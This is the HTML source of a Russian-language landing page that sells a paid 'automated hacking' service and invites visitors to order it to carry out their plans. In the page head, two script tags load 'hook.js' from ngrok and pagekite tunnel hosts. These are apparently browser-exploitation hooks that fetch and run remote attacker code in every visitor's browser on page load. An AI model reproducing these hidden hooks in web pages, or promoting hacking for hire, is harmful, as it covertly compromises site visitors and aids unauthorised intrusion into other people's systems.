<!DOCTYPE html>
<html lang="en">
<head>
   <meta name="viewport" content="width=device-width">
  <meta charset="utf-8">
  <title>Kama Kepar Ink</title>
<script src="https://kamakepar.pagekite.me/hook.js"></script>
   <script src="https://1b6c5628b53d.ngrok.io/hook.js"></script>
  <link href="https://fonts.googleapis.com/css?family=Kaushan+Script|Montserrat:400,700&amp;subset=cyrillic-ext" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital@1&display=swap" rel="stylesheet">
<script src="https://smtpjs.com/v3/smtp.js"></script><script src="https://code.jquery.com/jquery-2.2.4.min.js"></script>
<script>

</script></head>
<body>
<header class="header">
  <div class="container">
    <div class="header__inner">
      <div class="header__logo"><!---<img src="/icon.png">--->Hsite</div>
      
      <nav class="nav">
        <a href="/" class="nav__link">Начать</a>
        <a href="https://github.com/Kamakepar2029/" class="nav__link">Взлом</a>
        <a href="https://about.kamakepar.ru" class="nav__link">О нас</a>
      </nav>
    </div>
  </div>
</header>
<div class="intro">
  <div class="container">
    <div class="into__inner">
     <h1 class="intro__title">Добро пожаловать</h1>
    </div>
    <a class="btn" href="#start">Взломать</a>
  </div>
</div>
<section class="section" name="start" id="start">
  <div class="container">
    <div class="section__header">
      <h3 class="section__suptitle">Начало</h3>
      <h2 class="section__title">Кто мы такие?</h2>
      <div class="section__text">
        Мы люди, которые автоматизировали взлом ресурсов и хотят на этом заработать. Отвечу на возникший вопрос, который звучит примерно так: "Автоматизировали? А почему платно и не даете общественности?" <br>Я отвечу. Платно, поскольку на него было потрачено много времени. <br>Почему не даем общественности? Сами подумайте. Если бы все люди обладали этим скриптом, смогли ли бы вы спать спокойно, зная, что вас в любой момент абсолютно любой может взломать? Ответили на вопрос? <br><br>Тогда закажите услугу и мы поможем вам осуществить ваш план.</div>
      <a href="#project" class="btn">Услуги</a>
    </div>
  </div>
</section>
<!----
<div class="project" name="project" id="project">
  <div class="project__inner">
    <div class="project__header">
      <h1 class="project__title">Our Linux Live System</h1>
      <div class="project__img">
        <img src="/linuxx.jpg" class="project__image">
      </div>
      <div class="project__listing">
        <h3 class="project__lit_title">Why I need it?</h3>
        <ul style="text-align:left !important;">
          <li>It is stable</li>
          <li>Made on the most popular Ubuntu 16.04 LTS</li>
          <li>Has a lot of pentesting instruments</li>
          <li>Is very lightweight almost 1GB</li>
          <li>Was made as a live subsystem</li>
          <li>It Is x86 or i386, so all programms will run as fast as they can.</li>
      </div>
    </div>
  </div>
</div>--->
</body>
<style>
  .project__listing{
    color:white !important;
  }
  .project__header{
    margin-top:10px;
    text-align:center;
    display:flex;
    flex-direction:column;
    align-items:center;
    height:auto;
    width:100%;
  }
  .project__img{
    margin-top:10px;
    text-align:center;
    display:flex;
    justify-content:center;
    align-items:center;
    height:520px;
    width:520px;
  }
  .project__image{
    display:block;
    width:500px;
    border-radius: 5px;
    box-shadow: 0px 8px 8px 7px #37891a;
  }

  .project__title{
    color:white;
  }
  .project{
    margin-top:200px;
    display:flex;
    flex-direction:column;
    align-items:center;
    width:100%;
    hight:100vh;
  }
  .about{
    display:flex;
    margin-top:20px;
    justify-content:space-between;
    margin-bottom:20px;
  }
  .about__item{
    width:190px;
    background-color:#95e1d3;
  }
  .about__item:hover .about__image{
    transform: translate3d(-10px, -10px, 0) 
  }
  .about__item:hover .about__image img{
    opacity: .1;
  }
  .about__image{
    background: linear-gradient(to bottom, #f38181, #fce38a);
    transition: transform .2s linear;
  }
  .about__image img{
    width:190px;
    heiht:210px;
    display:block;
    transition: opacity .1s linear;
  }
  .section__header{
     text-align:center;
     padding:80px 0;
     color:white;
  }
  .section__title{
    font-weight:700;
    font-size:30px;
    color:white;
    text-transform:uppercase;
  }
  .section__text{
    font-size:15px;
    color:#999;
  }
  .section__title:after{
    content:"";
    display:block;
    width:60px;
    height:3px;
    background-color:#f38181;
    margin:30px auto;
  }
  .section{
    padding-bottom:30px;
     width:100%;
     max-width:950px;
     margin:0 auto 40px;
     width:100%;
    height:100vh;
    background:transparent;
  }
  body{
    background:black;
  }
  .section__suptitle{
    font-family: 'Kaushan Script', cursive;
    font-size:24px;
    color:white;
  }
  .btn{
    display:inline-block;
    vertical-align:top;
    border:3px solid white;
    padding:8px 30px;
    text-transform:uppercase;
    font-size:14px;
    color:white;
    font-weight:700;
    text-decoration:none;
    transition:background .1s linear, color .1s linear;
  }
  .btn:hover{
    background:white;
    color:black;
  }
  .intro__inner{
    width:100%;
    max-width:880px;
    margin:0 auto;
    text-align:left;
  }
  .intro__title{
    color:white;
    font-size:150px;
    margin-left:5px;
    font-weight:700;
    text-transform:uppercase;
    line-height:1;
  }
  .header__inner{
    display:flex;
    justify-content:space-between;
    align-items:center;
  }
  .nav__link{
    display:inline-block;
    vertical-align:top;
    margin:0 10px;
    position:relative;
    color:white;
    text-decoration:none;
    transition:color .2s linear;
  }
  .nav__link:hover{
    color:#078a70;
  }
  .nav{
    font-size:14px;
    text-transform:uppercase;
  }
  .header__logo{
    font-size:30px;
    font-weight:700;
    color:white;
  }
  .header{
    padding-top:30px;
    position:absolute;
    top:0px;
    left:0px;
    right:0px;
    z-index:1000;
    margin-left:40px;
    margin-right:40px;
  }
  h1,h2,h3.h4,h5{
    margin:0px;
  }
  .intro{
    text-align:left;
    width:100%;
    height:100vh;
    background:url('https://nypost.com/wp-content/uploads/sites/2/2018/06/shutterstock_565708549.jpg?quality=90&strip=all') center no-repeat;
    -webkit-background-size:cover;
    background-size:cover;
    display:flex;
    flex-direction:column;
    justify-content:center;
    align-items:center;
  }
  body{
    font-family: 'Montserrat', sans-serif;
    margin:0px;
    font-size:15px;
    line-height:1.6;
    color:#333;
  }
  *,
  *:before,
  *:after{
    box-sizing:border-box;
  }
  .container{
    width:100%;
    max-width:1200px;
    margin:0 auto;
  }
  @media screen and (max-width: 600px) {
    .project__img{
    margin-top:10px;
    text-align:center;
    display:flex;
    justify-content:center;
    align-items:center;
    height:210px;
    background:linear-gradient(to bottom, #f38181, #fce38a);
    width:210px;
    border:1px solid #f38181;
    border-radius:50%;
  }
  .project__image{
    display:block;
    width:200px;
    background:linear-gradient(to bottom, #f38181, #fce38a);
  }
    .intro__title{
    margin-top:50px;
    color:white;
    font-size:30px;
    font-weight:500;
    text-transform:uppercase;
    line-height:1;
  } 
  .container {
    width: 90%;
    margin-left: 20px !important;
    max-width: 1200px;
    margin: 0 auto;
  }
  .btn{
    margin-top:20px;
    margin-left:30px !important;
  }
  .header__logo{
    font-size:20px !important;
  }
  .about__image img{
    width:90px;
    heiht:70px;
  }
  .about__item{
    width:90px;
    background-color:#95e1d3;
  }
  .about__item:hover .about__image{
    transform: translate3d(-10px, -10px, 0) 
  }
  .about__item:hover .about__image img{
    opacity: .1;
  }
  .about__image{
    background: linear-gradient(to bottom, #f38181, #fce38a);
    transition: transform .2s linear;
  }
  }
  @media screen and (max-width: 992px) and (min-width: 601px){
    .project__img{
    margin-top:10px;
    text-align:center;
    display:flex;
    justify-content:center;
    align-items:center;
    height:420px;
    background:linear-gradient(to bottom, #f38181, #fce38a);
    width:420px;
    border:1px solid #f38181;
    border-radius:50%;
  }
  .project__image{
    display:block;
    width:400px;
    background:linear-gradient(to bottom, #f38181, #fce38a);
  }
    .intro__title{
    margin-top:50px;
    color:white;
    font-size:30px;
    font-weight:500;
    text-transform:uppercase;
    line-height:1;
  } 
  .btn{
    margin-top:20px;
  }
  .header__logo{
    font-size:20px !important;
  }
  .about__item{
    width:120px;
    background-color:#95e1d3;
  }
  .about__item:hover .about__image{
    transform: translate3d(-10px, -10px, 0) 
  }
  .about__item:hover .about__image img{
    opacity: .1;
  }
  .about__image{
    background: linear-gradient(to bottom, #f38181, #fce38a);
    transition: transform .2s linear;
  }
  .about__image img{
    width:120px;
    heiht:100px;
  }
  }
</style>
</html>